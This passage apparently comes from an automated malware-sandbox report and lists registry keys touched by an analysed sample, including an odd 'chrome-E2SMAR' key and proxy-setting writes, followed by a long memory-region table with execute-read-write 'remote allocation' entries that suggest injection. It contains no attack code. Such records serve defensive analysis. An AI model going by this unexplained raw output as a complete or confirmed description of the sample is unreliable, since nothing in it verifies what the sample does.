HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34598
|
34598
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\chrome-E2SMAR
|
exepath
|
||
|
HKEY_CURRENT_USER\Software\chrome-E2SMAR
|
licence
|
||
|
HKEY_CURRENT_USER\Software\chrome-E2SMAR
|
time
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 68 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
143D64000
|
direct allocation
|
page read and write
|
|
|
|
835000
|
heap
|
page read and write
|
|
|
|
143564000
|
direct allocation
|
page read and write
|
|
|
|
7B5000
|
heap
|
page read and write
|
|
|
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
296000
|
heap
|
page read and write
|
||
|
4060000
|
heap
|
page read and write
|
||
|
431C000
|
heap
|
page read and write
|
||
|
418E000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
187000
|
stack
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
3BBE000
|
stack
|
page read and write
|
||
|
2A6D000
|
trusted library allocation
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
43E2000
|
heap
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
29F2000
|
trusted library allocation
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
4114000
|
heap
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
3A9000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
7FFFFF89000
|
trusted library allocation
|
page execute read
|
||
|
3BD000
|
heap
|
page read and write
|
||
|
33F9000
|
heap
|
page read and write
|
||
|
1F30000
|
direct allocation
|
page read and write
|
||
|
3CC0000
|
trusted library allocation
|
page read and write
|
||
|
316000
|
heap
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
4319000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
1C20000
|
heap
|
page read and write
|
||
|
142800000
|
direct allocation
|
page read and write
|
||
|
4052000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
2A9A000
|
trusted library allocation
|
page read and write
|
||
|
432A000
|
heap
|
page read and write
|
||
|
2A66000
|
trusted library allocation
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
1C52E000
|
stack
|
page read and write
|
||
|
7FE896C0000
|
trusted library allocation
|
page read and write
|
||
|
235F000
|
stack
|
page read and write
|
||
|
43D9000
|
heap
|
page read and write
|
||
|
1A7E0000
|
heap
|
page read and write
|
||
|
81A000
|
heap
|
page read and write
|
||
|
4354000
|
heap
|
page read and write
|
||
|
1CC7000
|
direct allocation
|
page read and write
|
||
|
1F90000
|
direct allocation
|
page read and write
|
||
|
12A000
|
heap
|
page read and write
|
||
|
4485000
|
heap
|
page read and write
|
||
|
30F000
|
trusted library allocation
|
page read and write
|
||
|
142400000
|
direct allocation
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
43D3000
|
heap
|
page read and write
|
||
|
7FE89544000
|
trusted library allocation
|
page read and write
|
||
|
7FE896A0000
|
trusted library allocation
|
page read and write
|
||
|
1C64C000
|
stack
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
3E7000
|
heap
|
page read and write
|
||
|
56F7000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
C7000
|
heap
|
page read and write
|
||
|
111000
|
heap
|
page read and write
|
||
|
30CE000
|
trusted library allocation
|
page read and write
|
||
|
3D5E000
|
stack
|
page read and write
|
||
|
3473000
|
heap
|
page read and write
|
||
|
43E000
|
heap
|
page read and write
|
||
|
7FE898D4000
|
trusted library allocation
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
4078000
|
heap
|
page read and write
|
||
|
1CBF000
|
direct allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3B60000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
3B2000
|
heap
|
page read and write
|
||
|
33A5000
|
heap
|
page read and write
|
||
|
265000
|
heap
|
page read and write
|
||
|
344D000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
3A3000
|
heap
|
page read and write
|
||
|
1D99000
|
stack
|
page read and write
|
||
|
2E0000
|
trusted library allocation
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
3B45000
|
heap
|
page read and write
|
||
|
4078000
|
heap
|
page read and write
|
||
|
1AD3C000
|
stack
|
page read and write
|
||
|
56EB000
|
heap
|
page read and write
|
||
|
3665000
|
trusted library allocation
|
page read and write
|
||
|
339D000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
7FE898EB000
|
trusted library allocation
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
3A2000
|
heap
|
page read and write
|
||
|
1ED0000
|
heap
|
page read and write
|
||
|
5732000
|
heap
|
page read and write
|
||
|
4035000
|
heap
|
page read and write
|
||
|
471000
|
remote allocation
|
page execute and read and write
|
||
|
142400000
|
direct allocation
|
page read and write
|
||
|
2C8F000
|
stack
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
4353000
|
heap
|
page read and write
|
||
|
7FE89373000
|
trusted library allocation
|
page read and write
|
||
|
3CC0000
|
heap
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
7FE89BC5000
|
trusted library allocation
|
page read and write
|
||
|
13F78B000
|
unkown
|
page readonly
|
||
|
4073000
|
heap
|
page read and write
|
||
|
22C000
|
stack
|
page read and write
|
||
|
13FDD1000
|
unkown
|
page execute read
|
||
|
F7F000
|
stack
|
page read and write
|
||
|
4078000
|
heap
|
page read and write
|
||
|
1C498000
|
heap
|
page read and write
|
||
|
7FE898D2000
|
trusted library allocation
|
page read and write
|
||
|
4355000
|
heap
|
page read and write
|
||
|
415D000
|
trusted library allocation
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page read and write
|
||
|
12431000
|
trusted library allocation
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
33FF000
|
heap
|
page read and write
|
||
|
1C35B000
|
heap
|
page read and write
|
||
|
43F3000
|
heap
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
1C00000
|
heap
|
page read and write
|
||
|
4355000
|
heap
|
page read and write
|
||
|
2254000
|
heap
|
page read and write
|
||
|
1C80000
|
trusted library allocation
|
page read and write
|
||
|
197000
|
heap
|
page read and write
|
||
|
43EA000
|
heap
|
page read and write
|
||
|
173000
|
heap
|
page read and write
|
||
|
4080000
|
heap
|
page read and write
|
||
|
3DB000
|
heap
|
page read and write
|
||
|
40D3000
|
heap
|
page read and write
|
||
|
7FFFFF83000
|
trusted library allocation
|
page execute read
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
261000
|
heap
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
1AE6E000
|
stack
|
page read and write
|
||
|
4114000
|
heap
|
page read and write
|
||
|
3580000
|
trusted library allocation
|
page read and write
|
||
|
514F000
|
heap
|
page read and write
|
||
|
17C000
|
stack
|
page read and write
|
||
|
434D000
|
heap
|
page read and write
|
||
|
1B700000
|
heap
|
page read and write
|
||
|
43D3000
|
heap
|
page read and write
|
||
|
1C344000
|
heap
|
page read and write
|
||
|
7FFFFF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
4351000
|
heap
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
2260000
|
heap
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
4187000
|
heap
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
440F000
|
heap
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page read and write
|
||
|
13FDD1000
|
unkown
|
page execute read
|
||
|
43D3000
|
heap
|
page read and write
|
||
|
3B6000
|
heap
|
page read and write
|
||
|
51D1000
|
heap
|
page read and write
|
||
|
3590000
|
heap
|
page read and write
|
||
|
2A6D000
|
stack
|
page read and write
|
||
|
1FB7000
|
direct allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
554E000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
4187000
|
heap
|
page read and write
|
||
|
41F6000
|
heap
|
page read and write
|
||
|
3B9000
|
heap
|
page read and write
|
||
|
2A69000
|
trusted library allocation
|
page read and write
|
||
|
562E000
|
heap
|
page read and write
|
||
|
31D0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AB4000
|
trusted library allocation
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
2A72000
|
trusted library allocation
|
page read and write
|
||
|
4116000
|
heap
|
page read and write
|
||
|
406F000
|
trusted library allocation
|
page read and write
|
||
|
2A85000
|
trusted library allocation
|
page read and write
|
||
|
436000
|
heap
|
page read and write
|
||
|
4020000
|
heap
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
39E000
|
heap
|
page read and write
|
||
|
2A74000
|
trusted library allocation
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
1C29E000
|
stack
|
page read and write
|
||
|
3AE000
|
heap
|
page read and write
|
||
|
5572000
|
heap
|
page read and write
|
||
|
3BA000
|
heap
|
page read and write
|
||
|
1A8D7000
|
heap
|
page read and write
|
||
|
33E000
|
heap
|
page read and write
|
||
|
4069000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
13F850000
|
unkown
|
page write copy
|
||
|
30C000
|
stack
|
page read and write
|
||
|
2A6E000
|
trusted library allocation
|
page read and write
|
||
|
29E5000
|
trusted library allocation
|
page read and write
|
||
|
3D60000
|
trusted library allocation
|
page read and write
|
||
|
43E9000
|
heap
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
5566000
|
heap
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
55B8000
|
heap
|
page read and write
|
||
|
3B3000
|
heap
|
page read and write
|
||
|
7FE8937B000
|
trusted library allocation
|
page read and write
|
||
|
4076000
|
heap
|
page read and write
|
||
|
34E000
|
heap
|
page read and write
|
||
|
1A8B9000
|
heap
|
page read and write
|
||
|
3449000
|
heap
|
page read and write
|
||
|
3A80000
|
heap
|
page read and write
|
||
|
7FE89416000
|
trusted library allocation
|
page read and write
|
||
|
4AD000
|
heap
|
page read and write
|
||
|
3B78000
|
heap
|
page read and write
|
||
|
51AD000
|
heap
|
page read and write
|
||
|
13F85F000
|
unkown
|
page readonly
|
||
|
4126000
|
heap
|
page read and write
|
||
|
7FE89986000
|
trusted library allocation
|
page read and write
|
||
|
1EF000
|
trusted library allocation
|
page read and write
|
||
|
3449000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
43DD000
|
heap
|
page read and write
|
||
|
4126000
|
heap
|
page read and write
|
||
|
43F1000
|
heap
|
page read and write
|
||
|
2BCE000
|
stack
|
page read and write
|
||
|
3AA0000
|
trusted library allocation
|
page read and write
|
||
|
4080000
|
heap
|
page read and write
|
||
|
339A000
|
heap
|
page read and write
|
||
|
FE000
|
heap
|
page read and write
|
||
|
33FE000
|
heap
|
page read and write
|
||
|
3AA000
|
heap
|
page read and write
|
||
|
45D000
|
heap
|
page read and write
|
||
|
379000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
2FB000
|
stack
|
page read and write
|
||
|
366000
|
heap
|
page read and write
|
||
|
1C428000
|
heap
|
page read and write
|
||
|
1C411000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
418C000
|
heap
|
page read and write
|
||
|
33FD000
|
heap
|
page read and write
|
||
|
43C3000
|
heap
|
page read and write
|
||
|
41F6000
|
heap
|
page read and write
|
||
|
1CDB000
|
direct allocation
|
page read and write
|
||
|
1A6B0000
|
heap
|
page execute and read and write
|
||
|
573E000
|
heap
|
page read and write
|
||
|
384F000
|
stack
|
page read and write
|
||
|
565E000
|
heap
|
page read and write
|
||
|
3B71000
|
heap
|
page read and write
|
||
|
43C3000
|
heap
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
410F000
|
heap
|
page read and write
|
||
|
1C800000
|
heap
|
page read and write
|
||
|
5223000
|
heap
|
page read and write
|
||
|
4134000
|
heap
|
page read and write
|
||
|
3A90000
|
trusted library allocation
|
page read and write
|
||
|
9D000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
29E1000
|
trusted library allocation
|
page read and write
|
||
|
1C60000
|
direct allocation
|
page read and write
|
||
|
1B4EB000
|
stack
|
page read and write
|
||
|
15E000
|
heap
|
page read and write
|
||
|
4068000
|
heap
|
page read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
3DC000
|
heap
|
page read and write
|
||
|
11C000
|
stack
|
page read and write
|
||
|
1F50000
|
direct allocation
|
page read and write
|
||
|
1A9B9000
|
stack
|
page read and write
|
||
|
2A8E000
|
trusted library allocation
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
2160000
|
heap
|
page execute and read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
2A6B000
|
trusted library allocation
|
page read and write
|
||
|
4080000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1C44B000
|
heap
|
page read and write
|
||
|
43DD000
|
heap
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
406E000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
4039000
|
heap
|
page read and write
|
||
|
1C2A0000
|
heap
|
page read and write
|
||
|
4030000
|
heap
|
page read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
374000
|
heap
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
2E88000
|
trusted library allocation
|
page read and write
|
||
|
1A6CE000
|
heap
|
page execute and read and write
|
||
|
2A9C000
|
trusted library allocation
|
page read and write
|
||
|
167000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
435F000
|
heap
|
page read and write
|
||
|
435F000
|
heap
|
page read and write
|
||
|
1A74B000
|
heap
|
page read and write
|
||
|
3E00000
|
heap
|
page read and write
|
||
|
9401F000
|
direct allocation
|
page read and write
|
||
|
123ED000
|
trusted library allocation
|
page read and write
|
||
|
1A7B7000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
440F000
|
heap
|
page read and write
|
||
|
1B69B000
|
heap
|
page read and write
|
||
|
4126000
|
heap
|
page read and write
|
||
|
4485000
|
heap
|
page read and write
|
||
|
1D00000
|
direct allocation
|
page read and write
|
||
|
420000
|
heap
|
page read and write
|
||
|
7FE898E3000
|
trusted library allocation
|
page read and write
|
||
|
2A8E000
|
trusted library allocation
|
page read and write
|
||
|
410C000
|
heap
|
page read and write
|
||
|
402A000
|
heap
|
page read and write
|
||
|
3AF000
|
heap
|
page read and write
|
||
|
4073000
|
heap
|
page read and write
|
||
|
7FE89600000
|
trusted library allocation
|
page read and write
|
||
|
1CBB000
|
direct allocation
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
123D1000
|
trusted library allocation
|
page read and write
|
||
|
43DF000
|
heap
|
page read and write
|
||
|
7FFFFF84000
|
trusted library allocation
|
page readonly
|
||
|
43E9000
|
heap
|
page read and write
|
||
|
29EB000
|
trusted library allocation
|
page read and write
|
||
|
24E0000
|
trusted library allocation
|
page execute read
|
||
|
43C9000
|
heap
|
page read and write
|
||
|
34C000
|
heap
|
page read and write
|
||
|
520C000
|
heap
|
page read and write
|
||
|
265000
|
heap
|
page read and write
|
||
|
3670000
|
heap
|
page read and write
|
||
|
1B050000
|
heap
|
page read and write
|
||
|
440F000
|
heap
|
page read and write
|
||
|
3665000
|
trusted library allocation
|
page read and write
|
||
|
471000
|
remote allocation
|
page execute and read and write
|
||
|
7FE89610000
|
trusted library allocation
|
page read and write
|
||
|
1A58C000
|
stack
|
page read and write
|
||
|
24E000
|
heap
|
page read and write
|
||
|
1A8BC000
|
heap
|
page read and write
|
||
|
43D3000
|
heap
|
page read and write
|
||
|
435000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
570F000
|
heap
|
page read and write
|
||
|
4415000
|
heap
|
page read and write
|
||
|
1B665000
|
heap
|
page read and write
|
||
|
4068000
|
heap
|
page read and write
|
||
|
4408000
|
heap
|
page read and write
|
||
|
CDF000
|
stack
|
page read and write
|
||
|
27D5000
|
heap
|
page read and write
|
||
|
3451000
|
heap
|
page read and write
|
||
|
56A4000
|
heap
|
page read and write
|
||
|
1B056000
|
heap
|
page read and write
|
||
|
7FE89650000
|
trusted library allocation
|
page read and write
|
||
|
24E000
|
heap
|
page read and write
|
||
|
43E2000
|
heap
|
page read and write
|
||
|
4080000
|
heap
|
page read and write
|
||
|
340000
|
heap
|
page read and write
|
||
|
3665000
|
trusted library allocation
|
page read and write
|
||
|
4073000
|
heap
|
page read and write
|
||
|
344D000
|
heap
|
page read and write
|
||
|
410C000
|
heap
|
page read and write
|
||
|
557D000
|
heap
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
440F000
|
heap
|
page read and write
|
||
|
4328000
|
heap
|
page read and write
|
||
|
28A000
|
heap
|
page read and write
|
||
|
4060000
|
heap
|
page read and write
|
||
|
5755000
|
heap
|
page read and write
|
||
|
1C37B000
|
heap
|
page read and write
|
||
|
1FB7000
|
direct allocation
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
32D0000
|
trusted library allocation
|
page read and write
|
||
|
2421000
|
trusted library allocation
|
page read and write
|
||
|
3A5000
|
heap
|
page read and write
|
||
|
4353000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
16D000
|
heap
|
page read and write
|
||
|
309000
|
heap
|
page read and write
|
||
|
4063000
|
heap
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
3B68000
|
heap
|
page read and write
|
||
|
1C70000
|
heap
|
page read and write
|
||
|
347F000
|
heap
|
page read and write
|
||
|
13FF6B000
|
unkown
|
page readonly
|
||
|
4060000
|
heap
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
43AC000
|
heap
|
page read and write
|
||
|
3189000
|
trusted library allocation
|
page read and write
|
||
|
151000
|
heap
|
page read and write
|
||
|
43C8000
|
heap
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
1AEEF000
|
stack
|
page read and write
|
||
|
55C4000
|
heap
|
page read and write
|
||
|
141C00000
|
direct allocation
|
page read and write
|
||
|
1C70000
|
heap
|
page read and write
|
||
|
43F1000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
4126000
|
heap
|
page read and write
|
||
|
4078000
|
heap
|
page read and write
|
||
|
29E9000
|
trusted library allocation
|
page read and write
|
||
|
435E000
|
heap
|
page read and write
|
||
|
441C000
|
heap
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
43D3000
|
heap
|
page read and write
|
||
|
3AC8000
|
heap
|
page read and write
|
||
|
12598000
|
trusted library allocation
|
page read and write
|
||
|
406F000
|
heap
|
page read and write
|
||
|
14F000
|
heap
|
page read and write
|
||
|
4408000
|
heap
|
page read and write
|
||
|
80C000
|
heap
|
page read and write
|
||
|
241F000
|
stack
|
page read and write
|
||
|
182000
|
stack
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
7FFFFF88000
|
trusted library allocation
|
page readonly
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
43F1000
|
heap
|
page read and write
|
||
|
2B53000
|
trusted library allocation
|
page read and write
|
||
|
190000
|
heap
|
page read and write
|
||
|
1B86000
|
heap
|
page read and write
|
||
|
2A95000
|
trusted library allocation
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
43DF000
|
heap
|
page read and write
|
||
|
43F1000
|
heap
|
page read and write
|
||
|
123A1000
|
trusted library allocation
|
page read and write
|
||
|
5726000
|
heap
|
page read and write
|
||
|
43C1000
|
heap
|
page read and write
|
||
|
4319000
|
heap
|
page read and write
|
||
|
43E000
|
heap
|
page read and write
|
||
|
7FFFFF82000
|
trusted library allocation
|
page readonly
|
||
|
300000
|
heap
|
page read and write
|
||
|
12421000
|
trusted library allocation
|
page read and write
|
||
|
12451000
|
trusted library allocation
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
143200000
|
direct allocation
|
page read and write
|
||
|
5675000
|
heap
|
page read and write
|
||
|
14F000
|
heap
|
page read and write
|
||
|
339C000
|
heap
|
page read and write
|
||
|
2B6000
|
heap
|
page read and write
|
||
|
1B32E000
|
stack
|
page read and write
|
||
|
5B6000
|
heap
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
4311000
|
heap
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
55F3000
|
heap
|
page read and write
|
||
|
1242F000
|
trusted library allocation
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
22F0000
|
heap
|
page read and write
|
||
|
410F000
|
heap
|
page read and write
|
||
|
4060000
|
heap
|
page read and write
|
||
|
3E05000
|
heap
|
page read and write
|
||
|
29EB000
|
trusted library allocation
|
page read and write
|
||
|
406F000
|
heap
|
page read and write
|
||
|
1A75F000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
40D1000
|
heap
|
page read and write
|
||
|
418000
|
heap
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
70000
|
direct allocation
|
page read and write
|
||
|
7FFFFF87000
|
trusted library allocation
|
page execute read
|
||
|
3B68000
|
heap
|
page read and write
|
||
|
261000
|
heap
|
page read and write
|
||
|
7FFFFF88000
|
trusted library allocation
|
page readonly
|
||
|
552B000
|
heap
|
page read and write
|
||
|
43D6000
|
heap
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
2A92000
|
trusted library allocation
|
page read and write
|
||
|
3475000
|
heap
|
page read and write
|
||
|
418E000
|
heap
|
page read and write
|
||
|
29F2000
|
trusted library allocation
|
page read and write
|
||
|
5589000
|
heap
|
page read and write
|
||
|
47D2000
|
heap
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
3B72000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
4126000
|
heap
|
page read and write
|
||
|
1C34D000
|
heap
|
page read and write
|
||
|
3665000
|
trusted library allocation
|
page read and write
|
||
|
51C5000
|
heap
|
page read and write
|
||
|
551F000
|
heap
|
page read and write
|
||
|
43DF000
|
heap
|
page read and write
|
||
|
43AB000
|
heap
|
page read and write
|
||
|
3AB0000
|
heap
|
page read and write
|
||
|
1CC0000
|
direct allocation
|
page read and write
|
||
|
5699000
|
heap
|
page read and write
|
||
|
4312000
|
heap
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
406D000
|
heap
|
page read and write
|
||
|
2A6F000
|
trusted library allocation
|
page read and write
|
||
|
1A420000
|
heap
|
page read and write
|
||
|
232B000
|
heap
|
page read and write
|
||
|
440F000
|
heap
|
page read and write
|
||
|
5595000
|
heap
|
page read and write
|
||
|
40D3000
|
heap
|
page read and write
|
||
|
3665000
|
trusted library allocation
|
page read and write
|
||
|
1C30C000
|
stack
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
3DE000
|
heap
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
3195000
|
trusted library allocation
|
page read and write
|
||
|
362A000
|
trusted library allocation
|
page read and write
|
||
|
4065000
|
heap
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
29EF000
|
trusted library allocation
|
page read and write
|
||
|
2A96000
|
trusted library allocation
|
page read and write
|
||
|
43C3000
|
heap
|
page read and write
|
||
|
29F2000
|
trusted library allocation
|
page read and write
|
||
|
3AB000
|
heap
|
page read and write
|
||
|
2F5C000
|
trusted library allocation
|
page read and write
|
||
|
5669000
|
heap
|
page read and write
|
||
|
41F4000
|
heap
|
page read and write
|
||
|
15F000
|
heap
|
page read and write
|
||
|
1C75E000
|
stack
|
page read and write
|
||
|
4342000
|
heap
|
page read and write
|
||
|
2F9C000
|
stack
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
4440000
|
heap
|
page read and write
|
||
|
40D5000
|
heap
|
page read and write
|
||
|
3A3000
|
heap
|
page read and write
|
||
|
51E8000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
429000
|
heap
|
page read and write
|
||
|
1B20F000
|
stack
|
page read and write
|
||
|
339F000
|
heap
|
page read and write
|
||
|
7FE896B0000
|
trusted library allocation
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
7FE89500000
|
trusted library allocation
|
page read and write
|
||
|
2E9F000
|
trusted library allocation
|
page read and write
|
||
|
7FE8951C000
|
trusted library allocation
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
3B52000
|
heap
|
page read and write
|
||
|
31EA000
|
trusted library allocation
|
page read and write
|
||
|
7FE89513000
|
trusted library allocation
|
page read and write
|
||
|
268000
|
stack
|
page read and write
|
||
|
2514000
|
heap
|
page read and write
|
||
|
4068000
|
heap
|
page read and write
|
||
|
43F3000
|
heap
|
page read and write
|
||
|
55D0000
|
heap
|
page read and write
|
||
|
1CBD000
|
direct allocation
|
page read and write
|
||
|
1B7FC000
|
stack
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
4037000
|
heap
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
4076000
|
heap
|
page read and write
|
||
|
3454000
|
heap
|
page read and write
|
||
|
420000
|
heap
|
page read and write
|
||
|
3665000
|
trusted library allocation
|
page read and write
|
||
|
143A00000
|
direct allocation
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2C4000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
406E000
|
heap
|
page read and write
|
||
|
29E9000
|
trusted library allocation
|
page read and write
|
||
|
43D3000
|
heap
|
page read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF81000
|
trusted library allocation
|
page execute read
|
||
|
3AB0000
|
heap
|
page read and write
|
||
|
43E9000
|
heap
|
page read and write
|
||
|
2E95000
|
trusted library allocation
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
7FE895B0000
|
trusted library allocation
|
page read and write
|
||
|
123B1000
|
trusted library allocation
|
page read and write
|
||
|
4415000
|
heap
|
page read and write
|
||
|
3B6A000
|
heap
|
